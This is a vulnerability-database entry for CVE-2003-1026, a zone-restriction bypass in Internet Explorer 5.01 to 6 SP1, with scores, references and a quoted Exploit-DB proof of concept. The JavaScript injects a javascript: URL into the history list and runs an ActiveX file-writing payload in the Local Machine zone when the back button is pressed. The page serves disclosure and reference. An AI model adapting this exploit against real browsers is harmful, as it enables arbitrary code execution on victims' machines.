CVE-2003-1026 : Detail

CVE-2003-1026

A01-Broken Access Control
1.57%V3
Network
2004-01-08 04:00 +00:00
2018-10-12 17:57 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

Internet Explorer 5.01 through 6 SP1 allows remote attackers to bypass zone restrictions via a javascript protocol URL in a sub-frame, which is added to the history list and executed in the top window's zone when the history.back (back) function is called, as demonstrated by BackToFramedJpu, aka the "Travel Log Cross Domain Vulnerability."

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Metrics

Metric Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 151

Publication date : 2004-02-03 23:00 +00:00
Author : Andreas Sandblad
EDB Verified : Yes

// Andreas Sandblad, 2004-02-03, patched by MS04-004 // Name: payload // Purpose: Run payload code called from Local Machine zone. // The code may be arbitrary such as executing shell commands. // This demo simply creates a harmless textfile on the desktop. function payload() { file = "sandblad.txt"; o = new ActiveXObject("ADODB.Stream"); o.Open(); o.Type=2; o.Charset="ascii"; o.WriteText("You are vulnerable!"); o.SaveToFile(file, 2); o.Close(); alert("File "+file+" created on desktop!"); } // Name: trigger // Purpose: Inject javascript url in history list and run payload // function when the user hits the backbutton. function trigger(len) { if (history.length != len) payload(); else return "-"; } // Name: backbutton // Purpose: Run backbutton exploit. function backbutton() { location = 'javascript:'+trigger+payload+'trigger('+history.length+')'; } // Launch backbutton exploit on load if (confirm("Press OK to run backbutton exploit!")) backbutton(); # milw0rm.com [2004-02-04]

Products Mentioned

Configuraton 0

Microsoft>>Ie >> Version 6.0

    Microsoft>>Internet_explorer >> Version 5.0

    Microsoft>>Internet_explorer >> Version 5.0.1

    Microsoft>>Internet_explorer >> Version 5.0.1

    Microsoft>>Internet_explorer >> Version 5.0.1

    Microsoft>>Internet_explorer >> Version 5.0.1

    Microsoft>>Internet_explorer >> Version 5.5

    Microsoft>>Internet_explorer >> Version 5.5

    Microsoft>>Internet_explorer >> Version 5.5

    Microsoft>>Internet_explorer >> Version 6.0

    References

    http://www.kb.cert.org/vuls/id/784102
    Tags : third-party-advisory, x_refsource_CERT-VN
    http://marc.info/?l=bugtraq&m=107038202225587&w=2
    Tags : mailing-list, x_refsource_BUGTRAQ
    http://www.us-cert.gov/cas/techalerts/TA04-033A.html
    Tags : third-party-advisory, x_refsource_CERT
    http://marc.info/?l=bugtraq&m=106979349517578&w=2
    Tags : mailing-list, x_refsource_BUGTRAQ
    Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.